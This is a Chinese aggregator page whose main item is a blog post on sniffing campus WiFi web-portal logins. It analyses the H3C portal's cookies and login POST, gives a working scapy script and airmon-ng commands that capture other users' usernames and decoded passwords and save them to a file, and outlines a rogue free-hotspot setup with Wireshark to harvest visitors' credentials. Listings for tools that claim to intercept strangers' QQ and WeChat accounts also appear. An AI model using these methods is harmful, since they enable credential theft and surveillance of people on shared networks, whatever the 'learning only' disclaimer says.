精华内容
下载资源
问答
  • Wifi嗅探器软件可以从附近截获无线wifi信号,搜索附近人qq、朋友网、人人、微信等账号考普WiFi附近人。功能介绍:Wifi嗅探器是一个全新技术的革命性产品,从空中嗅探无线信号,创新
  • Wifi嗅探器是一个全新技术的革命性产品,从空中嗅探无线信号,创新性解决两类问题: 一是企业对自己无线路由器的上网管控和安全问题,重点解决社交软件聊天内容、加密邮件内容、上网行为和无线注入四大核心功能; ...
  • wifi嗅探

    2014-10-22 21:25:35
    wifi嗅探
  • wifi嗅探安卓版

    2018-08-08 14:34:42
    wifi嗅探安卓版,安装在手机上打开wifi,可嗅探到附近wifi相关信息,功能强大
  • Wifi嗅探器 v6.20.zip

    2019-07-15 05:39:34
    Wifi嗅探器软件功能介绍 Wifi嗅探器是一个全新技术的革命性产品,从空中嗅探无线信号,创新性解决两类问题: 一是企业对自己无线路由器的上网管控和安全问题,重点解决社交软件聊天内容、加密邮件内容、上网行为...
  • 软件介绍:Wifi嗅探器是一个全新技术的革命性产品,从空中嗅探无线信号,创新性解决两类问题: 一是企业对自己无线路由器的上网管控和安全问题,重点解决社交软件聊天内容、加密邮件内容、上网行为和无线注入四大...
  • ***********************本文提及的方法仅供安全学习用途,禁止非法利用**************************0x00 写在前面某高校校区的校园网WIFI的采用H3C的Web认证,在网页里输入学号和密码,post出去,你的这个mac地址就...

    ***********************本文提及的方法仅供安全学习用途,禁止非法利用**************************

    0x00 写在前面

    某高校校区的校园网WIFI的采用H3C的Web认证,在网页里输入学号和密码,post出去,你的这个mac地址就可以上网了。此方式不是wpa/wpa2,也不是802.1x,而只是单纯的web认证,是大有文章可做的。因此我想是否能在开放无线网环境中抓取到登陆时认证发送的数据包,从中取出用户名和密码。

    参考Freebuf的如何在开放无线网络中嗅探校园网密码这篇文章提供的python脚本,针对该校的网络进行了一些修改,使用该脚本嗅探校园网WIFI账号密码。

    0x01 初步分析认证交互

    查看DOM

    发现了几个重要的函数。base64()、checkUserName()、encrypt()

    base64是将输入的文本进行一次base64编码,checkUerName就是检查用户名,encrypt是将密码再进行一次加密。

    分析网络流

    首先使用火狐的firebug+检查元素来分析网络流。

    当我们访问登陆页面时,发送GET请求并带一个i_p_pl的cookie

    尝试登陆,登陆成功跳转到http://192.168.xxx.x:xxxx/portal/page/loginSucc.jsp,发送了*个GET请求,除去图片和脚本,此次登陆只向/portal/loginSucc.jsp发送了GET包,除了i_p_pl,还带有hello1、hello2两个个cookie,其中hello1为登陆发送的username,hello2暂不明其含义。

    在后来的测试中,发现hello2是【记住登陆】功能的参数,当hello2=false时不记住,hello2=true时记住并附带hello3、hello4、hello5参数,本来应当是可以利用这些cookie来绕过登陆直接请求认证的,不过考虑到其又要增加工作量,因此先放一边。

    这就很奇怪了,在整个登陆过程全部都是GET请求而没有POST请求,没有POST请求是怎么把用户名密码传输上去认证的呢?况且之前已经在DOM中发现了base64encode()和query()函数。难道用户名和密码是在GET时Cookie中传上去的?。虽然不用想就知道GET发送cookie来登陆很扯,但还是要研究一下cookie的含义。

    探究cookie含义

    登陆时发送的i_p_pl

    i_p_pl=JTdCJTIyZXJyb3JOdW1iZXIlMjIlM0ElMjIxJTIyJTJDJTIybmV4dFVybCUyMiUzQSUyMmh0dHAlM0ElMkYlMkYxOTIuMTY4LjE1MC4yJTNBODA4MCUyRnBvcnRhbCUyRmluZGV4X2RlZmF1bHQuanNwJTIyJTJDJTIycXVpY2tBdXRoJTIyJTNBZmFsc2UlMkMlMjJjbGllbnRMYW5ndWFnZSUyMiUzQSUyMkNoaW5lc2UlMjIlMkMlMjJhc3NpZ25JcFR5cGUlMjIlM0EwJTJDJTIyaU5vZGVQd2ROZWVkRW5jcnlwdCUyMiUzQTElMkMlMjJ3bGFubmFzaWQlMjIlM0ElMjIlMjIlMkMlMjJ3bGFuc3NpZCUyMiUzQSUyMiUyMiUyQyUyMm5hc0lwJTIyJTNBJTIyJTIyJTJDJTIyYnlvZFNlcnZlcklwJTIyJTNBJTIyMC4wLjAuMCUyMiUyQyUyMmJ5b2RTZXJ2ZXJJcHY2JTIyJTNBJTIyMDAwMCUzQTAwMDAlM0EwMDAwJTNBMDAwMCUzQTAwMDAlM0EwMDAwJTNBMDAwMCUzQTAwMDAlMjIlMkMlMjJieW9kU2VydmVySHR0cFBvcnQlMjIlM0ElMjI4MDgwJTIyJTJDJTIyaWZUcnlVc2VQb3B1cFdpbmRvdyUyMiUzQWZhbHNlJTJDJTIydWFtSW5pdEN1c3RvbSUyMiUzQSUyMjElMjIlMkMlMjJjdXN0b21DZmclMjIlM0ElMjJNUSUyMiUyQyUyMnJlZ0NvZGVUeXBlJTIyJTNBJTIyTUElMjIlN0Q

    很明显这是一个base64编码过的字符串,把这个base64解码再url解码,就得到了

    {"errorNumber":"1","nextUrl":"http://192.168.xxx.x:xxxx/portal/index_default.jsp","quickAuth":false,"clientLanguage":"Chinese","assignIpType":0,"iNodePwdNeedEncrypt":1,"wlannasid":"","wlanssid":"","nasIp":"","byodServerIp":"0.0.0.0","byodServerIpv6":"0000:0000:0000:0000:0000:0000:0000:0000","byodServerHttpPort":"8080","ifTryUsePopupWindow":false,"uamInitCustom":"1","customCfg":"MQ","regCodeType":"MA"}

    这只是向无线路由器发送的表明自己身份的未完成的表单,没有我们要的用户名和密码。

    0x02 Wireshark抓取完整认证过程

    只有GET请求果然很扯,这很有可能是我们的浏览器网络流分析工具有些问题,或者该Web认证的安全性足够好,导致我们无法截取完整的请求流。

    这样就只有用Wireshark来对网卡进行完全的监听,以抓取全部流量包。

    设置Capture interface为 WLAN 无线网卡,开启抓取后重现登陆过程。

    抓到的流量包除了访问该认证网站的http流,还包括了所有经过该无线网卡的所有协议的网络流。

    设置过滤规则为http协议并且只有该认证网址ip。

    发现登录一次h3c系统,要先后传参给3个页面,一个/pws?t=li,一个/afterlogin.jsp,一个/loginSucc.jsp,所以就分别看这几个网页的抓包数据。

    发现其cookie都是一样的,但是只有pws这个页面是POST请求。

    查看pws应用层传输的数据,发现上传了【userName】和【userPwd】参数,也就是说,只有这个页面是验证密码的。

    【userName】就是登陆的用户名,【userPwd】是经过base64编码后的密码。

    0x03 总结思路

    我们可以抓取用户登陆时的POST请求来获取用户名和密码,也可以在用户勾选【记住密码】时获取带有用户名密码信息的cookie。当抓到client ==> server的数据包时如果是GET请求,检查有没有Cookie存在。

    如果是POST请求,把用户名和密码拿出来。2. 当抓到的是server ==> client的数据包时检查是否有set-cookie头部,有的话取出来。

    最后如果有cookie被嗅探到,就带着cookie把向server索要一下密码。

    但是为了偷懒,这里就不嗅探cookie了,直接嗅探POST的用户名和密码就行了。最终思路如下:

    当抓到client ==> server的数据包时,如果是POST请求,直接把用户名和密码拿出来。

    0x04 嗅探

    实验环境Ubuntu虚拟机

    大功率USB无线网卡(8187等)

    python2.7

    python扩展库需要requests

    scapy

    scapy_http

    lxml

    代码

    import requests

    import scapy_http.http as http

    from scapy.all import *

    from lxml import etree

    iface = 'wlan0'

    url = "http://192.168.xxx.x:xxxx/portal/pws?t=li"

    path = "/root"

    def prn(pkt):

    data = None

    #std ==> ap

    if pkt.haslayer(http.HTTPRequest):

    #if post the username and password

    if pkt.Method == 'POST' and 'userName' in pkt.load:

    dt = {i.split("=")[0]:i.split("=")[1] for i in pkt.load.split("&")}

    data = ":::".join((dt["userName"],dt["userPwd"][3:].decode("base64"))) + '\n'

    print '[+]Get! Post data:%s%s%s%s'%(dt['userName'],dt['userPwd'])

    if data != None:

    with open(path + "schoolUserPwd.txt", "a") as txt:

    txt.write(data)

    def main():

    try:

    sniff(iface=iface, prn=prn, filter="ip host 192.168.xxx.x", store=0)

    #sniff(offline=path + "school.pcap", prn=prn, filter="ip host 192.168.xxx.x")

    except KeyboardInterrupt, e:

    print "quitting..."

    if __name__ == '__main__':

    main()

    说明requests用来向服务器请求

    scapy用来在无线网络中嗅探

    scapy_http用来对http协议更方便的解析

    lxml用来从服务器返回的html文件中,解析出来用户名和密码

    prn是sniff函数每过滤到一个符合条件的数据包时回调的函数,并将数据包本身作为参数传入

    之所以选择Ubuntu而不是Windows是因为scapy_http在win下运行有些问题

    注意

    由于我们既要嗅探,同时又要向服务器请求,所以airmon-ng check kill后,无线网卡开启monitor模式,再将网卡调到信号最强的ap的信道上。之前经过kismet抓取无线网包发现该校园网WIFI是在channel 1/6/11信道上工作的。

    最后再打开网络管理的服务。

    执行以下命令

    $sudo airmon-ng check kill

    $sudo ifconfig wlan0 down

    $sudo iwconfig wlan0 mode monitor

    $sudo ifconfig wlan0 up

    $sudo iwconfig mon0 channel 1/6/11

    $sudo service network-manager start

    结果

    由于之前买的无线网卡是劣质品无法识别,因此暂无结果。

    理论上是可以嗅探到的,等成功嗅探后再补发。

    就算没有嗅探到,这个思路也是可以学习一下的。。。

    ******************再次强调,本文提及的方法仅供安全学习用途,禁止非法利用******************

    参考:

    展开全文
  •  1: create_ap , 搭建免费wifi。  2: wireshark , 嗅探网络信息。  搭建热点  搭建热点: git clone https://github.com/oblique/create_ap cd create_ap make install  安装完毕以后, 使用以下...

      环境:

      1: create_ap , 搭建免费wifi。

      2: wireshark , 嗅探网络信息。

      搭建热点

      搭建热点:

    git clone https://github.com/oblique/create_ap
    cd create_ap
    make install

      安装完毕以后, 使用以下命令搭建热点:

    create_ap wlan0 eth0 nonowifi

      wireshark嗅探信息

      需要捕获的网卡,选择热点创建出来的ap0

      等待别人连上这个免费热点以后, 所有的浏览记录, 所有的请求都会被wireshark记录下,

      可以使用wireshark的过滤规则, 过滤出我们需要的信息, 如果网页中有个人密码和用户信息的话, 通过分析请求的地址和请求内容即可得到; 

      相关:

      Wireshark过滤规则之:http数据包:http://blog.csdn.net/chenzhisi/article/details/49814769

    作者: NONO
    出处:http://www.cnblogs.com/diligenceday/
    企业网站:http://www.idrwl.com/
    开源博客:http://www.github.com/sqqihao
    QQ:287101329
    微信:18101055830 

    厦门点燃未来网络科技有限公司, 是厦门最好的微信应用, 小程序, 微信网站, 公众号开发公司

    展开全文
  • 最近在写一个专利,关于wifi探针。 具体论文会在论文申请成功之后放出来。 最近积累了一点。 名词解释: 载波侦听: 载波侦听主要应用于以太网通讯中,是指网络中的计算机在发送数据之前,会“侦听”线缆,判断是否...

    最近在写一个专利,关于wifi探针。
    具体论文会在论文申请成功之后放出来。
    最近积累了一点零碎的知识做一下记录。

    名词解释:

    载波侦听:
    载波侦听主要应用于以太网通讯中,是指网络中的计算机在发送数据之前,会“侦听”线缆,判断是否已经有其他数据传输。(有线的侦听方式为检测电压差)
    CSMA(Carrier Sense Multiple Access)被称为载波侦听多路访问方法:
    三种CSMA模式:
    1-persistentes CSMA: 时刻监听信道,空暇即发送
    0-persistentes CSMA: 间隔时间监听信道,检测空暇即发送。
    p-persistentes CSMA: 时刻监听信道,空暇时发送的概率为p
    LBT机制(Listen Before Talk):
    先检测信道中是否有数据传输,然后再决定是否发送信息。
    KISS原则(Keep It Simple and Stupid):
    简单地理解这句话,就是要把一个产品做得连白痴都会用,因而也被称为“懒人原则”。换句话说来,”简单就是美“。KISS 原则源于 David Mamet(大卫马梅)的电影理论,后来被逐渐延伸扩展到其他领域。
    CSMA/CA的用途:
    无线网络中存在隐蔽站与暴露站的问题,因此设计了CSMA/CA来完成无线局域网下的冲突检测,利用它检测和避免当两个或两个以上的网络设备需要进行数据传送时网络上的冲突
    CSMA/CA的工作原理: 为解决无线网络中,部分非工作站只能接收到部分信息产生的误导
    请求发送帧RTS(Request To Send):
    附带将要发送的数据帧长度,非工作站只接受到rts帧,则说明不会干扰,可以继续工作。
    允许发送帧CTS(Clear To Send):
    附带将要发送的数据帧长度,非工作站若只接受到cts帧,则自己当前发送数据会影响到工作站,应该在接收数据帧的时间内关闭数据发送操作。若rts,cts都能接收到,则在整个数据帧发送接受过程不能发送数据。仍产生冲突,各自随机推迟一段时间发送rts帧,推迟时间为指数退避。

    论文题目:

    一种防范WiFi探针的敏感数据保护方法

    展开全文
  • 黑客可以通过观察无线WIFI信号变化,窃取到你的密码,PINs码和键盘快捷键等敏感信息。 来自上海交通大学、南佛罗里达大学、马塞诸塞州和波士顿大学的联合研究团队公布了他们研究的最新技术。该项技术仅需要搭建一个...

    黑客可以通过观察无线WIFI信号变化,窃取到你的密码,PINs码和键盘快捷键等敏感信息。

    来自上海交通大学、南佛罗里达大学、马塞诸塞州和波士顿大学的联合研究团队公布了他们研究的最新技术。该项技术仅需要搭建一个WIIF热点,即可分析无线电信号变化并窃取敏感信息。

    这项技术被命名为WindTalker,这项攻击技术通过读取称为信道状态信息(CSI)的无线电信号模式,嗅探手机触屏变化或者电脑键盘按键运动。

    CSI是WIFI协议的一部分,它提供了WIFI信号状态信息。

    “攻击者可以利用CSI波动与击键之间的强相关性来推断用户的号码输入。

    以下是攻击者如何跟踪你的手指在智能手机屏幕上移动:

    当你在任何APP中输入PIN码、密码或滑动智能手机锁屏模式,你的手指的动作改变将由移动电话发射到无线信号中。

    现在,黑客控制公共无线网络WIFI热点,你的设备连接这些WIFI,黑客可以截获,分析和逆向工程这些信号。黑客可以准确地猜测出你输入的敏感数据或者是你输入的密码字段。

    因为无需直接访问受害者手机,WindTalker攻击手法相当有效,并且对非智能手机可以达到同样的攻击效果。

    这种攻击需要黑客控制目标连接的WIFI热点,这个热点可以收集WIFI信号。

    WindTalker不会运行在老式的路由器中,因为它依赖于一种称为多输入多输出(MIMO)的技术。

    不过这不是什么大问题,因为新型的无线路由器携带有多条天线和MIMO技术,这使得路由器能够同时连接和传输来自多个设备的数据。

    WindTalker 攻击成功率达68%。

    研究员在使用多款手机在真实场景中测试了WindTalker的攻击效果。试验中,研究员成功的恢复了在支付宝支付交易中输入的6位数PIN交易码。

    研究人员说:“测试结果表明,攻击者可以以很高概率成功率恢复密钥。

    “在实践中,攻击者有更多的选择来实现用户特定的训练。 例如,它可以简单地为用户提供免费的WiFi接入,作为回报,受害者应通过点击指定的号码完成在线训练。 它也可以模仿文字验证码,要求受害者输入选择的数字。“研究人员说:”即使一个击键只有一个训练样本,WindTalker仍然可以实现68.3%的整体恢复率。”

    WindTalker攻击的准确率基于手机型号不同而改变。并且用户输入越多,攻击者在其上收集的数据更多,也可以提高其精度。

    WindTalker攻击技术也在于10月24日至28日在奥地利维也纳举行的第23届计算机和通信安全计算机器会议协会上出现过。


    作者:佚名

    来源:51CTO

    展开全文
  • 一、首先安装bettercap 我这里的环境是ubuntu 16.04 1 apt-get install build-essential ruby-dev libpcap-dev git ruby 2 gem install bettercap ...二、开始嗅探: ...之后开始嗅探如下图其实是一...
  • 关于WIFI被无线AP嗅探的条件

    千次阅读 2018-04-28 11:42:44
    测试结果:1)iphone 必须要连接任意AP,才能被1600 AP嗅探器探测到。2)android 不需要连接任何AP,只需要开启wifi就能被1600探测到。3)iphone连接AP,进入热键锁屏待机模式是可以被探测到的,但是,10分钟后...
  • [源码]python Scapy Ftp密码嗅探原理很简单,FTP密码明文传输的截取tcp 21端口User和Pass数据即可Scapy框架编译程序较大(一个空程序都25M),所以就不提供exe# -*- coding: UTF-8 -*-#author: k8gegeimport osimport ...
  • Google的街景车除了拍摄360度街景外,还顺带利用车载包嗅探设备收集了附近路由器的 MAC地址以用于更好的定位服务,以及嗅探未加密开放WiFi网络中的数据。这一做法在隐私方面引发了争议,尤其是在隐私保护更严格的...
  • 答案当然是肯定的,因此在这篇文章中,我们将教会大家如何使用树莓派3B来搭建一个稳定的WiFi监控平台,并通过几个简单的步骤来将其模拟成一个Wimonitor。 硬件要求 1. 运行Windows的笔记本电脑(测试设备使用的...
  • 安卓wifi破解、中间人攻击、安卓wifi嗅探,断开连接等
  • 现在很多人走到一个地方,首先要问的第一句就是“这里有没有WIFI?”但随之出现的无线网络安全问题却没有引起人们足够的重视。在一些公众场合,例如机场,火车站,咖啡厅,餐馆等场所都会设置一些免费的无线WIFI供...
  • iSniff GPS被动地嗅探附近的iPhone,iPad和其他无线设备广播的SSID探针,ARP和MDNS(Bonjour)数据包。 目的是仅基于每个设备公开的有关先前加入的WiFi网络的信息,收集可用于识别每个设备并确定先前地理位置的数据...
  • 现在到处是免费wifi,到处是低头玩手机的小伙伴。如果用ettercap嗅探一下,会有什么结果呢?下面是在自己电脑上测试的结果,找个机会再到商场、咖啡馆实地测试去。 实际上,就是用ettercap的arp欺骗功能,实现了一...
  • Kali-WIFI攻防(一)----无线网络嗅探工具Kismet

    万次阅读 多人点赞 2017-04-04 11:52:46
    Kismet是802.11二层无线网络探测器,嗅探器和入侵检测系统。它将与支持原始监视(rfmon)模式中的任何无线网卡的工作,并能嗅出的802.11a / b / g / n的流量。它可以使用其他程序来播放音频警报网络事件,读出网络...
  • 嗅探

    千次阅读 2013-10-24 23:03:28
    所有处于统一WiFi网络的人可以很容易的获取其他手机收发的内容,包括照片和录像。你可以用嗅探器软件做个实验. 每一个在局域网(LAN)上的工作站都有其硬件地址,这些地址惟一地表示了网络上的机器(这一点...
  • 嗅探宾馆住客

    2019-10-25 03:44:44
    一般宾馆都提供免费的wifi 这些网络中一般不会对流量进行加密 我们随机连接一家宾馆的wifi 然后查看发送的post请求,你或许会看到你的信息以明文的形式发送到服务器上 你可以联想到网吧,如果要用手机登录网吧的...
  • 更新时间:2012-08-31资费提示:免费版当前版本:1.1.2软件语言:...WiFinspect是一款wifi网络管理工具,可以查看wifi信息,当前网络中的ip,还配备了嗅探器分析工具,同时可以对ap热点的密码进行扫描,需要root权限。
  • ComSec作业一、嗅探

    2020-09-15 22:32:21
    1.首先获取网卡,在这里用的wifi,所以选择wifi,设置过滤器ip src host 10.255.1.182 2.开始捕获 3.在目标网站进行登录,以http://ctcp.scnu.edu.cn为例 4.登陆完成以后停止捕获 5.显示HTTP协议中POST请求的包,将...

空空如也

空空如也

1 2 3 4 5 ... 8
收藏数 153
精华内容 61
关键字:

wifi嗅探